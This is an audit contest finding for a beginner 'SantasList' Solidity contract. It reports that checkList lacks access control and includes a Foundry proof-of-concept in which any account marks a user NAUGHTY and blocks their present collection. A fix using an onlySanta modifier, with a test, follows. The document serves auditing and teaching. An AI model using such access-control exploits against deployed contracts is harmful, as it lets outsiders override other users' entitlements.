Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Valid

Anyone can stop any member of the list from collecting their presents by calling `checkList` and changing their status to `Status.NAUGHTY`

Summary

  • Anyone can stop all members of the list from collecting their presents by calling `checkList` and setting `Status.NAUGHTY` for every address stored in `s_theListCheckedOnce`.

Vulnerability Details

  • Below is a test showing that anyone can stop one or all members of the list from collecting their presents: an arbitrary account calls `checkList` to set `Status.NAUGHTY` for an address, after which that address's call to `collectPresent` reverts with the `SantasList__NotNice` error.

```solidity
function testTocheckAnyoneCanChangeTheStatusToStopTheCollectionOfPresent() public {
    // Santa marks `user` as NICE on both passes.
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.NICE);
    santasList.checkTwice(user, SantasList.Status.NICE);
    vm.stopPrank();

    // An unrelated account (`hawks`) overwrites the first-pass status with NAUGHTY.
    vm.startPrank(hawks);
    santasList.checkList(user, SantasList.Status.NAUGHTY);
    vm.stopPrank();

    // After Christmas, `user` can no longer collect: collectPresent reverts with SantasList__NotNice.
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
    vm.startPrank(user);
    vm.expectRevert(SantasList.SantasList__NotNice.selector);
    santasList.collectPresent();
    vm.stopPrank();
}
```
  • Here is the code showing that `checkList` can be called by anyone and will overwrite the status of the given address (the `@>` markers highlight the documented intent versus the missing access control):

```solidity
/*
 * @notice Do a first pass on someone if they are naughty or nice.
@> * Only callable by santa
 *
 * @param person The person to check
 * @param status The status of the person
 */
@> function checkList(address person, Status status) external {
    s_theListCheckedOnce[person] = status;
    emit CheckedOnce(person, status);
}
```
  • Here is the code showing that `collectPresent` reverts unless the address has the same status, `Status.NICE` or `Status.EXTRA_NICE`, in both lists.
    For example, if Santa marked an address as `Status.NICE` in `s_theListCheckedOnce` and `s_theListCheckedTwice` by calling `checkList` and
    `checkTwice` respectively, anyone can then call `checkList` and change the first-pass status to `Status.NAUGHTY`, so the address's call to
    `collectPresent` reverts with `SantasList__NotNice`. Both checks are marked with `@>` below.

The `collectPresent` function:
```solidity
/*
 * @notice Collect your present if you are nice or extra nice. You get extra presents if you are extra nice.
 * - Nice: Collect an NFT
 * - Extra Nice: Collect an NFT and a SantaToken
 * This should not be callable until Christmas 2023 (give or take 24 hours), and addresses should not be able to collect more than once.
 */
function collectPresent() external {
    if (block.timestamp < CHRISTMAS_2023_BLOCK_TIME) {
        revert SantasList__NotChristmasYet();
    }
    if (balanceOf(msg.sender) > 0) {
        revert SantasList__AlreadyCollected();
    }
@>  if (s_theListCheckedOnce[msg.sender] == Status.NICE && s_theListCheckedTwice[msg.sender] == Status.NICE) {
        _mintAndIncrement();
        return;
    } else if (
@>      s_theListCheckedOnce[msg.sender] == Status.EXTRA_NICE
            && s_theListCheckedTwice[msg.sender] == Status.EXTRA_NICE
    ) {
        _mintAndIncrement();
        i_santaToken.mint(msg.sender);
        return;
    }
    revert SantasList__NotNice();
}
```

Impact

  • Anyone can stop one or all members of the list from collecting their presents by calling `checkList` and setting `Status.NAUGHTY` for any address stored in `s_theListCheckedOnce`.

Tools Used

  • Manual Review

  • Foundry

Recommendations

  • `checkList` should be callable by Santa only, as its NatSpec already states; restrict it with the `onlySanta` modifier.

/*
* @notice Do a first pass on someone if they are naughty or nice.
* Only callable by santa
*
* @param person The person to check
* @param status The status of the person
*/
- function checkList(address person, Status status) external {
+ function checkList(address person, Status status) external onlySanta {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}
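Review bot: the `+` line relies on an `onlySanta` modifier that is not shown in this hunk; confirm it is defined in `SantasList` and reverts for any caller other than Santa, since otherwise the change does not compile. The NatSpec above the function already says "Only callable by santa", so no doc change is needed once the modifier is in place, but a test that a non-Santa caller reverts should accompany the fix.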
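To show the recommended fix end to end, the following is an added, self-contained example and not the project's code: a hypothetical minimal contract `SantasListFixed` (assumed names `i_santa`, `SantasListFixed__NotSanta`) that gates `checkList` with `onlySanta`, plus a Foundry test asserting that the `hawks` account from the PoC can no longer overwrite a status set by Santa.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical minimal contract: only the parts of SantasList needed to show
// the onlySanta gate on checkList (not the project's own code).
contract SantasListFixed {
    enum Status { NICE, EXTRA_NICE, NAUGHTY }
    error SantasListFixed__NotSanta(); // assumed error name
    event CheckedOnce(address indexed person, Status indexed status);

    address private immutable i_santa; // assumed: Santa is the deployer
    mapping(address => Status) public s_theListCheckedOnce;

    // The fix from the recommendation: only Santa may call checkList.
    modifier onlySanta() {
        if (msg.sender != i_santa) revert SantasListFixed__NotSanta();
        _;
    }

    constructor() { i_santa = msg.sender; }

    function checkList(address person, Status status) external onlySanta {
        s_theListCheckedOnce[person] = status;
        emit CheckedOnce(person, status);
    }
}

contract SantasListFixedTest is Test {
    SantasListFixed internal list;
    address internal santa = makeAddr("santa");
    address internal user = makeAddr("user");
    address internal hawks = makeAddr("hawks"); // the arbitrary caller from the PoC

    function setUp() public {
        vm.prank(santa);
        list = new SantasListFixed();
    }

    function testOnlySantaCanCheckList() public {
        vm.prank(santa);
        list.checkList(user, SantasListFixed.Status.NICE);

        // A non-Santa caller reverts and cannot flip the status to NAUGHTY.
        vm.prank(hawks);
        vm.expectRevert(SantasListFixed.SantasListFixed__NotSanta.selector);
        list.checkList(user, SantasListFixed.Status.NAUGHTY);

        assertEq(uint256(list.s_theListCheckedOnce(user)), uint256(SantasListFixed.Status.NICE));
    }
}
```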
Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.
